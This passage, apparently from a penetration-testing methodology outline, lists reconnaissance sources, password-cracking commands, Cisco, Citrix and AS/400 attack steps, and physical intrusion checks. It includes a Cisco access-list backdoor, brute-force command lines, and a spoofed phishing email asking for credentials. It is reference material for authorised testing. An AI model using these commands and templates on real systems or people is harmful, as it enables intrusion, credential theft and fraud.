18. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

18.1. Untitled

18.1.1. Authoratitive Bodies IANA - Internet Assigned Numbers Authority ICANN - Internet Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry AFRINIC - African Network Information Centre APNIC - Asia Pacific Network Information Centre ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre

18.1.2. Websites Central Ops Domain Dossier Email Dossier DNS Stuff Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries. Fixed Orbit Autonomous System lookups and other online tools available. Geektools IP2Location Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information. Kartoo Metasearch engine that visually presents its results. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution Excellent site that can be used if the above is down Netcraft Online search tool allowing queries for host information. Passive DNS Replication Finds shared domains based on supplied IP addresses Note: - Website utilised by nmap hostmap.nse script Robtex Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify) Website listing a large number links to online traceroute resources. Wayback Machine Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

18.1.3. Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot

18.2. Internet Search

18.2.1. General Information Web Investigator Tracesmart Friends Reunited Ebay - profiles etc.

18.2.2. Financial EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK

18.2.3. Phone book/ Electoral Role Information 123people Electoral Role Search. UK 411 Online White Pages and Yellow Pages. US Untitled Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US UK Residential Business Pipl Untitled Spokeo Yasni Zabasearch People Search Engine. US

18.2.4. Generic Web Searching Code Search Forum Entries Google Hacking Database Google Email Addresses Contact Details Newsgroups/forums Blog Search Yammer Google Blog Search Technorati Jaiku Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty Grokker Zuula Exalead Delicious

18.2.5. Metadata Search Untitled MetaData Visualisation Sites Tools Wikipedia Metadata Search

18.2.6. Social/ Business Networks Untitled Africa Australia Belgium Holland Hungary Iran Japan Korea Poland Russia Sweden UK US Assorted

18.2.7. Resources OSINT International Directory of Search Engines

18.3. DNS Record Retrieval from publically available servers

18.3.1. Types of Information Records SOA Records - Indicates the server that has authority for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host information record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain.

18.3.2. Database Settings Version.bind Serial Refresh Retry Expiry Minimum

18.3.3. Sub Domains

18.3.4. Internal IP ranges Reverse DNS for IP Range

18.3.5. Zone Transfer

18.4. Social Engineering

18.4.1. Remote Phone Scenarios Results Contact Details Email Scenarios Software Results Contact Details Other

18.4.2. Local Personas Name Phone Email Business Cards Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee Fire Inspector Results Maps Satalitte Imagery Building layouts Other

18.5. Dumpster Diving

18.5.1. Rubbish Bins

18.5.2. Contract Waste Removal

18.5.3. Ebay ex-stock sales i.e. HDD

18.6. Web Site copy

18.6.1. htttrack

18.6.2. teleport pro

18.6.3. Black Widow

19. Password cracking

19.1. Rainbow crack

19.1.1. ophcrack

19.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

19.2. Ophcrack

19.3. Cain & Abel

19.4. John the Ripper

19.4.1. ./unshadow passwd shadow > file_to_crack

19.4.2. ./john -single file_to_crack

19.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

19.4.4. ./john -show file_to_crack

19.4.5. ./john --incremental:All file_to_crack

19.5. fgdump

19.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

19.6. pwdump6

19.7. medusa

19.8. LCP

19.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

19.9.1. Domain credentials

19.9.2. Sniffing

19.9.3. pwdump import

19.9.4. sam import

19.10. aiocracker

19.10.1. [md5, sha1, sha256, sha384, sha512] hash dictionary_list

20. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

20.1. Manual

20.1.1. Patch Levels

20.1.2. Confirmed Vulnerabilities Severe High Medium Low

20.2. Automated

20.2.1. Reports

20.2.2. Vulnerabilities Severe High Medium Low

20.3. Tools

20.3.1. GFI

20.3.2. Nessus (Linux) Nessus (Windows)

20.3.3. NGS Typhon

20.3.4. NGS Squirrel for Oracle

20.3.5. NGS Squirrel for SQL

20.3.6. SARA

20.3.7. MatriXay

20.3.8. BiDiBlah

20.3.9. SSA

20.3.10. Oval Interpreter

20.3.11. Xscan

20.3.12. Security Manager +

20.3.13. Inguma

20.4. Resources

20.4.1. Security Focus

20.4.2. Microsoft Security Bulletin

20.4.3. Common Vulnerabilities and Exploits (CVE)

20.4.4. National Vulnerability Database (NVD)

20.4.5. The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

20.4.6. United States Computer Emergency Response Team (US-CERT)

20.4.7. Computer Emergency Response Team

20.4.8. Mozilla Security Information

20.4.9. SANS

20.4.10. Securiteam

20.4.11. PacketStorm Security

20.4.12. Security Tracker

20.4.13. Secunia


20.4.15. ntbugtraq

20.4.16. Wireless Vulnerabilities and Exploits (WVE)

20.5. Blogs

20.5.1. Carnal0wnage

20.5.2. Fsecure Blog

20.5.3. g0ne blog

20.5.4. GNUCitizen

20.5.5. ha.ckers Blog

20.5.6. Jeremiah Grossman Blog

20.5.7. Metasploit

20.5.8. nCircle Blogs

20.5.9. pentest

20.5.10. Rational Security

20.5.11. Rise Security

20.5.12. Security Fix Blog

20.5.13. Software Vulnerability Exploitation Blog

20.5.14. Taosecurity Blog

21. AS/400 Auditing

21.1. Remote

21.1.1. Information Gathering Nmap using common iSeries (AS/400) services. Unsecured services (Port;name;description) Secured services (Port;name;description) NetCat (old school technique) nc -v -z -w target ListOfServices.txt | grep "open" Banners Grabbing Telnet FTP HTTP Banner POP3 SNMP SMTP

21.1.2. Users Enumeration Default AS/400 users accounts Error messages Telnet Login errors POP3 authentication Errors Qsys symbolic link (if ftp is enabled) ftp target | quote stat | quote site namefmt 1 cd / quote site listfmt 1 mkdir temp quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys') quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys') dir /temp/qsys/*.usrprf LDAP Need os400-sys value from ibm-slapdSuffix Tool to browse LDAP

21.1.3. Exploitation CVE References CVE-2005-1244 - Severity : High - CVSS : 7.0 CVE-2005-1243 - Severity : Low - CVSS : 3.3 CVE-2005-1242 - Severity : Low - CVSS : 3.3 CVE-2005-1241 - Severity : High - CVSS : 7.0 CVE-2005-1240 - Severity : High - CVSS : 7.0 CVE-2005-1239 - Severity : Low - CVSS : 3.3 CVE-2005-1238 - Severity : High - CVSS : 9.0 CVE-2005-1182 - Severity : Low - CVSS : 3.3 CVE-2005-1133 - Severity : Low - CVSS : 3.3 CVE-2005-1025 - Severity : Low - CVSS : 3.3 CVE-2005-0868 - Severity : High - CVSS : 7.0 CVE-2005-0899 - Severity : Low - CVSS : 2.3 CVE-2002-1822 - Severity : Low - CVSS : 3.3 CVE-2002-1731 - Severity : Low - CVSS : 2.3 CVE-2000-1038 - Severity : Low - CVSS : 3.3 CVE-1999-1279 - Severity : Low - CVSS : 3.3 CVE-1999-1012 - Severity : Low - CVSS : 3.3 Access with Work Station Gateway http://target:5061/WSG Default AS/400 accounts. Network attacks (next release) DB2 QSHELL Hijacking Terminals Trojan attacks Hacking from AS/400

21.2. Local

21.2.1. System Value Security Untitled Untitled Untitled Untitled Untitled Untitled Untitled Recommended value is 30

21.2.2. Password Policy Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled Untitled

21.2.3. Audit level Untitled Recommended value is *SECURITY

21.2.4. Documentation Users class Untitled System Audit Settings Untitled Special Authorities Definitions Untitled

22. Bluetooth Specific Testing

22.1. Bluescanner

22.2. Bluesweep

22.3. btscanner

22.4. Redfang

22.5. Blueprint

22.6. Bluesnarfer

22.7. Bluebugger

22.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

22.8. Blueserial

22.9. Bloover

22.10. Bluesniff

22.11. Exploit Frameworks

22.11.1. BlueMaho Untitled

22.12. Resources

22.12.1. URL's Bluejackers bluetooth-pentest Trifinite

22.12.2. Vulnerability Information Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

22.12.3. White Papers Bluesnarfing

23. Cisco Specific Testing

23.1. Methodology

23.1.1. Scan & Fingerprint. Untitled Untitled If SNMP is active, then community string guessing should be performed.

23.1.2. Credentials Guessing. Untitled Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

23.1.3. Connect Untitled If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

23.1.4. Check for bugs Untitled The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

23.1.5. Further your attack Untitled running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network. Untitled #> access-list 100 permit ip <IP> any

23.2. Scan & Fingerprint.

23.2.1. Port Scanning nmap Untitled Other tools Untitled mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

23.2.2. Fingerprinting Untitled BT cisco-torch-0.4b # -A Untitled TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt Untitled

23.3. Password Guessing.

23.3.1. Untitled ./CAT  -h  <IP>  -a  password.wordlist Untitled

23.3.2. Untitled ./enabler <IP> [-u username] -p password /password.wordlist [port] Untitled

23.3.3. Untitled BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco Untitled

23.4. SNMP Attacks.

23.4.1. Untitled ./CAT  -h  <IP>  -w  SNMP.wordlist Untitled

23.4.2. Untitled onesixytone  -c  SNMP.wordlist  <IP> BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt Scanning 1 hosts, 64 communities [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support:  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

23.4.3. Untitled snmapwalk  -v  <Version>  -c  <Community string>  <IP> Untitled

23.5. Connecting.

23.5.1. Telnet Untitled  telnet  <IP> Sample Banners

23.5.2. SSH

23.5.3. Web Browser Untitled This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required Enter username and password for "level_15_access" at User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

23.5.4. TFTP Untitled Untitled ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names. Untitled ./ <options> <IP,hostname,network> ./ <options> -F <hostlist> Creating backdoors in Cisco IOS using TCL

23.6. Known Bugs.

23.6.1. Attack Tools Untitled Untitled Untitled Web browse to the Cisco device: http://<IP> Untitled Untitled Untitled Untitled ./ios-w3-vul fetch > /tmp/router.txt

23.6.2. Common Vulnerabilities and Exploits (CVE) Information Vulnerabilties and exploit information relating to these products can be found here:

23.7. Configuration Files.

23.7.1. Untitled Configuration files explained The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access. Untitled Untitled Password Encryption Utilised Untitled Configuration Testing Tools Nipper fwauto (Beta)

23.8. References.

23.8.1. Cisco IOS Exploitation Techniques

24. Citrix Specific Testing

24.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

24.2. Enumeration

24.2.1. web search Google (GHDB) ext:ica inurl:citrix/metaframexp/default/login.asp [WFClient] Password= filetype:ica inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:/Citrix/Nfuse17/ inurl:Citrix/MetaFrame/default/default.aspx Google Hacks (Author Discovered) filetype:ica Username= inurl:/Citrix/AccessPlatform/ inurl:LogonAgent/Login.asp inurl:/CITRIX/NFUSE/default/login.asp inurl:/Citrix/NFuse161/login.asp inurl:/Citrix/NFuse16 inurl:/Citrix/NFuse151/ allintitle:MetaFrame XP Login allintitle:MetaFrame Presentation Server Login inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On allintitle:Citrix(R) NFuse(TM) Classic Login Yahoo originurlextension:ica

24.2.2. site search Manual review web page for useful information review source for web page

24.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

24.2.4. citrix specific perl ip_address enum.js enum.js apps TCPBrowserAdress=ip_address connect.js connect.js TCPBrowserAdress=ip_address Application=advertised-application Citrix-pa-scan perl ip_address [timeout] > pas.wri pabrute.c ./pabrute pubapp list app_list ip_address

24.2.5. Default Ports TCP Citrix XML Service Advanced Management Console Citrix SSL Relay ICA sessions Server to server Management Console to server Session Reliability (Auto-reconnect) License Management Console License server UDP Clients to ICA browser service Server-to-server

24.2.6. nmap nse scripts citrix-enum-apps nmap -sU --script=citrix-enum-apps -p 1604 <host> citrix-enum-apps-xml nmap --script=citrix-enum-apps-xml -p 80,443 <host> citrix-enum-servers nmap -sU --script=citrix-enum-servers -p 1604 citrix-enum-servers-xml nmap --script=citrix-enum-servers-xml -p 80,443 <host> citrix-brute-xml nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

24.3. Scanning

24.3.1. Nessus Plugins CGI abuses CGI abuses : Cross Site Scripting (XSS) Misc. Service Detection Web Servers Windows

24.3.2. Nikto perl -host ip_address -port port_no. Untitled

24.4. Exploitation

24.4.1. Alter default .ica files InitialProgram=cmd.exe InitialProgram=explorer.exe

24.4.2. Enumerate and Connect For applications identified by Citrix-pa-scan Pas For published applications with a Citrix client when the master browser is non-public. Citrix-pa-proxy

24.5. Brute Force

24.5.1. bforce.js bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt Untitled

24.6. Review Configuration Files

24.6.1. Application server configuration file appsrv.ini Location World writeable Review other files Sample file

24.6.2. Program Neighborhood configuration file pn.ini Location Review other files Sample file

24.6.3. Citrix ICA client configuration file wfclient.ini Location

24.7. References

24.7.1. Vulnerabilities Art of Hacking Common Vulnerabilities and Exploits (CVE) Sample file Untitled OSVDB[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia Secunia SecurityFocus

24.7.2. Support Citrix Knowledge Base Thinworld

24.7.3. Exploits Milw0rm Art of Hacking Citrix

24.7.4. Tools Resource Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

25. Network Backbone

25.1. Generic Toolset

25.1.1. Wireshark (Formerly Ethereal) Passive Sniffing Usernames/Passwords Email FTP HTTP HTTPS RDP VOIP Other Filters ip.src == ip_address ip.dst == ip_address tcp.dstport == port_no. ! ip.addr == ip_address (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

25.1.2. Cain & Abel Active Sniffing ARP Cache Poisoning DNS Poisoning Routing Protocols

25.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

25.1.4. NTP-Fingerprint perl -t [ip_address]

25.1.5. Yersinia

25.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

25.1.7. Manual Check (Credentials required)

25.1.8. MAC Spoofing mac address changer for windows macchanger Random Mac Address:- macchanger -r eth0 madmacs smac TMAC

26. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

26.1. Password Attacks

26.1.1. Known Accounts Identified Passwords Unidentified Hashes

26.1.2. Default Accounts Identified Passwords Unidentified Hashes

26.2. Exploits

26.2.1. Successful Exploits Accounts Passwords Groups Other Details Services Backdoor Connectivity

26.2.2. Unsuccessful Exploits

26.2.3. Resources Securiteam Exploits are sorted by year and must be downloaded individually SecurityForest Updated via CVS after initial install GovernmentSecurity Need to create and account to obtain access Red Base Security Oracle Exploit site only Wireless Vulnerabilities & Exploits (WVE) Wireless Exploit Site PacketStorm Security Exploits downloadable by month and year but no indexing carried out. SecWatch Exploits sorted by year and month, download seperately SecurityFocus Exploits must be downloaded individually Metasploit Install and regualrly update via svn Milw0rm Exploit archived indexed and sorted by port download as a whole - The one to go for!

26.3. Tools

26.3.1. Metasploit Free Extra Modules local copy

26.3.2. Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets Untitled

26.3.3. SQL Power Injector

26.3.4. SecurityForest

26.3.5. SPI Dynamics WebInspect

26.3.6. Core Impact

26.3.7. Cisco Global Exploiter

26.3.8. PIXDos perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

26.3.9. CANVAS

26.3.10. Inguma

27. Server Specific Tests

27.1. Databases

27.1.1. Direct Access Interrogation MS SQL Server Ports Version osql Oracle Ports TNS Listener SQL Plus Default Account/Passwords Default SID's MySQL Ports Version Users/Passwords DB2 Informix Sybase Other

27.1.2. Scans Default Ports Non-Default Ports Instance Names Versions

27.1.3. Password Attacks Sniffed Passwords Cracked Passwords Hashes Direct Access Guesses

27.1.4. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

27.2. Mail

27.2.1. Scans

27.2.2. Fingerprint Manual Automated

27.2.3. Spoofable Telnet spoof telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: []X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.Target [email protected].

27.2.4. Relays

27.3. VPN

27.3.1. Scanning 500 UDP IPSEC 1723 TCP PPTP 443 TCP/SSL nmap -sU -PN -p 500 ipsecscan

27.3.2. Fingerprinting ike-scan --showbackoff

27.3.3. PSK Crack ikeprobe sniff for responses with C&A or ikecrack

27.4. Web

27.4.1. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

27.4.2. Permissions PUT /test.txt HTTP/1.0 CONNECT HTTP/1.0 POST HTTP/1.0Content-Type: text/plainContent-Length: 6

27.4.3. Scans

27.4.4. Fingerprinting Other HTTP Commands Modules File Extensions HTTPS Commands Commands File Extensions

27.4.5. Directory Traversal\

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms Check for active network jacks. Check for any information in room.

28.1.2. Lobby Check for active network jacks. Does receptionist/guard leave lobby? Accessbile printers? Print test page. Obtain phone/personnel listing.

28.1.3. Communal Areas Check for active network jacks. Check for any information in room. Listen for employee conversations.

28.1.4. Room Security Resistance of lock to picking. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors? Ceiling access areas. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows Check windows/doors for visible intruderalarm sensors. Check visible areas for sensitive information. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

28.2.3. Guards Patrol Routines Analyse patrol timings to ascertain if any holes exist in the coverage. Communications Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

28.3. Entry Points

28.3.1. Guarded Doors Piggybacking Attempt to closely follow employees into thebuilding without having to show valid credentials. Fake ID Attempt to use fake ID to gain access. Access Methods Test 'out of hours' entry methods

28.3.2. Unguarded Doors Identify all unguardedentry points. Are doors secured? Check locks for resistance to lock picking.

28.3.3. Windows Check windows/doors for visible intruderalarm sensors. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

29. Final Report - template

30. Contributors

30.1. Matt Byrne (

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (